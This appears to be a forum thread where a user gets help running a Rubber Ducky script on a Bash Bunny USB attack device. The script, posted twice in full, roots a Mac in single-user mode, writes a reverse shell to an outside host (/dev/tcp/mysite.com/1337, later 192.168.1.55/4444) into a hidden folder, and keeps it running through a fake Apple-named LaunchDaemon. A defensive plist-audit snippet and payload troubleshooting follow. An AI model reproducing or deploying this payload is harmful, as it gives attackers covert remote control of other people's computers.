Posted

Can someone please explain how you use Ducky code txt on the Bash Bunny?

Step by step would be appreciated.

 

Thanks

Posted

Example:

How would I get this to work on the Bash Bunny?

REM Patrick Mosca
REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER
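
For defenders, the script above leaves a recognisable artifact on disk: a LaunchDaemon job that runs a shell script from a dot-hidden directory at load and every 60 seconds, under a label that imitates Apple's namespace. The audit check below is an added example, not part of the original thread; the sample plist is constructed from the lines the script types, and the function names, finding names and the 300-second threshold are assumptions.

```python
import plistlib
from pathlib import PurePosixPath

# Constructed sample: the job definition typed by the script above, as bytes.
SAMPLE_PLIST = b"""<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>/Library/.hidden/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>"""

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}

def has_hidden_component(path):
    """True if any directory or file name in the path starts with a dot."""
    return any(p.startswith(".") and p not in (".", "..") for p in PurePosixPath(path).parts)

def audit_launchd_plist(raw):
    """Return heuristic findings (assumed rules, not a standard) for one launchd job."""
    job = plistlib.loads(raw)  # accepts XML and binary plists
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    findings = []
    if args and args[0] in SHELLS:
        findings.append("shell-interpreter")
    if any(has_hidden_component(a) for a in args):
        findings.append("hidden-path")
    if job.get("RunAtLoad") and 0 < job.get("StartInterval", 0) <= 300:
        findings.append("frequent-relaunch")
    if job.get("AbandonProcessGroup"):
        findings.append("abandon-process-group")
    label = job.get("Label", "")
    if label.startswith("com.apple") and not label.startswith("com.apple."):
        findings.append("apple-lookalike-label")
    return findings

if __name__ == "__main__":
    print(audit_launchd_plist(SAMPLE_PLIST))
```

To sweep a host, pass the bytes of each file in /Library/LaunchDaemons to `audit_launchd_plist` and review any job that returns more than one finding.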
Posted

Hey buddy

Thanks for your reply.

I've looked but still can't get it to work.

Can you PLEASE give an example?

 

Thank you 

Posted

Easiest way both for maintenance as well as for actual use is to put your script as is into a file.  Say ducky.txt.  Then do:
QUACK ducky.txt

Otherwise, if you want it inline, just put QUACK in front of each line.

  • Upvote 1
Posted

Did this and it still doesn't work.

Any ideas guys, please?

What am I missing?

 

#!/bin/bash
LED R
ATTACKMODE HID 
LED R G 
QUACK DELAY 1000
QUACK STRING mount -uw /
QUACK ENTER
QUACK DELAY 2000
QUACK STRING mkdir /Library/.hidden
QUACK ENTER
QUACK DELAY 200
QUACK STRING echo '#!/bin/bash
QUACK ENTER
QUACK STRING bash -i >& /dev/tcp/192.168.1.55/4444 0>&1
QUACK ENTER
QUACK STRING wait' > /Library/.hidden/connect.sh
QUACK ENTER
QUACK DELAY 500
QUACK STRING chmod +x /Library/.hidden/connect.sh
QUACK ENTER
QUACK DELAY 200
QUACK STRING mkdir /Library/LaunchDaemons
QUACK ENTER
QUACK DELAY 200
QUACK STRING echo '<plist version="1.0">
QUACK ENTER
QUACK STRING <dict>
QUACK ENTER
QUACK STRING <key>Label</key>
QUACK ENTER
QUACK STRING <string>com.apples.services</string>
QUACK ENTER
QUACK STRING <key>ProgramArguments</key>
QUACK ENTER
QUACK STRING <array>
QUACK ENTER
QUACK STRING <string>/bin/sh</string>
QUACK ENTER
QUACK STRING <string>/Library/.hidden/connect.sh</string>
QUACK ENTER
QUACK STRING </array>
QUACK ENTER
QUACK STRING <key>RunAtLoad</key>
QUACK ENTER
QUACK STRING <true/>
QUACK ENTER
QUACK STRING <key>StartInterval</key>
QUACK ENTER
QUACK STRING <integer>60</integer>
QUACK ENTER
QUACK STRING <key>AbandonProcessGroup</key>
QUACK ENTER
QUACK STRING <true/>
QUACK ENTER
QUACK STRING </dict>
QUACK ENTER
QUACK STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
QUACK ENTER
QUACK DELAY 500
QUACK STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
QUACK ENTER
QUACK DELAY 200
QUACK STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
QUACK ENTER
QUACK DELAY 1000
QUACK STRING shutdown -h now
QUACK ENTER

LED R
 

Posted

It works with the Rubber Ducky but I can't get it to run on the Bash Bunny.

The light goes red and green but no keystrokes.

Posted
41 minutes ago, valentino00776 said:

It works with the Rubber Ducky but I can't get it to run on the Bash Bunny.

The light goes red and green but no keystrokes.

@valentino00776

This answers my question 1... What about answering question 2?

Posted

I've tried the nscan payload and that works.

I'm so sorry GermanNoob, what's the duckyinstall payload?

Sorry for my lack of knowledge

Even got a wifi nano never used for 9 months lol

Posted
11 minutes ago, valentino00776 said:

 

I've tried the nscan payload and that works.

 

I don't know that payload... Where did you get it from? Or did you mean nmapper? Most probably the payload you tested doesn't use the QUACK command...

12 minutes ago, valentino00776 said:

I'm so sorry GermanNoob, what's the duckyinstall payload?

As you don't know it, I assume you haven't installed it, and therefore it is most probably the reason why QUACK doesn't work...

Copy the duckyinstall payload from the library to one of the switches and run it. After it has succeeded, test your original script again...

Posted

Yes, sorry, nmapper.

I'll try your suggestion and let you know.

Really appreciate your time and help, buddy.

Posted

Just looking at the payload.

Do I need to unzip it and run it somewhere (on a different PC)?

What do I actually install, and how?

I know it's getting embarrassing to ask.

Posted

Hey illwill, thanks.

But what do you mean?

Can you show me an example, or use what I've posted to show me?

Thank you

Posted
19 minutes ago, valentino00776 said:

Just looking at the payload.

Do I need to unzip it and run it somewhere (on a different PC)?

What do I actually install, and how?

I know it's getting embarrassing to ask.

You don't have to unzip anything... just move everything to the switch folder and go for it. 

What you are going to install? Just read the readme.txt!

Quote

DuckToolkit installer for Bash Bunny. 
Adds support for new languages and uses the Ducktoolkit python library for encoding.

Version 1.0.0

Moves the library files to /tools
Update Q and QUACK to point to the new library
Writes error to /root/ducky.log

Purple Blinking.................Moving tools
Purple Solid....................Tools moved
Amber Blinking..................Setup tools
Red Solid.......................Tool installation failed
White Solid.....................Installation completed successfully

 

Posted

OK, so I copied duckyinstall onto switch 1, plugged it in, and it has an install log saying installed.

I then copied my payload .txt to switch 2 and tried it with the QUACK commands on every line, but still nothing.

My hair is going grey LOL

Posted

Install log

 

Install Log:
----------------
Found /root/udisk/payloads/switch1/DuckToolkit-1.0.1.tar.gz
Copying files to target dir
Move Complete
Update Q
Update QUACK
 

Posted (edited)

Just to be sure: is it named "payload .txt" or "payload.txt"?

And please try a simple "hello world" payload... In your script I'm missing opening a terminal or similar... 

And post that script also...

Edited by GermanNoob
Posted

This worked 

 

#!/bin/bash

ATTACKMODE HID 
LED R G 


QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 500
QUACK STRING notepad
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 750
QUACK STRING Hello World!!!
QUACK ENTER

Posted

The original script is done on a Mac in single user mode, in which the terminal is already open.

It just won't type any of the commands.

Runs great with the Rubber Ducky.

Posted

Congratulations!

So now it's only something about your script...

4 hours ago, valentino00776 said:

#!/bin/bash
LED R
ATTACKMODE HID 
LED R G 
QUACK DELAY 1000
QUACK STRING mount -uw /
QUACK ENTER

You simply begin to quack commands without having opened a terminal or anything to write in...
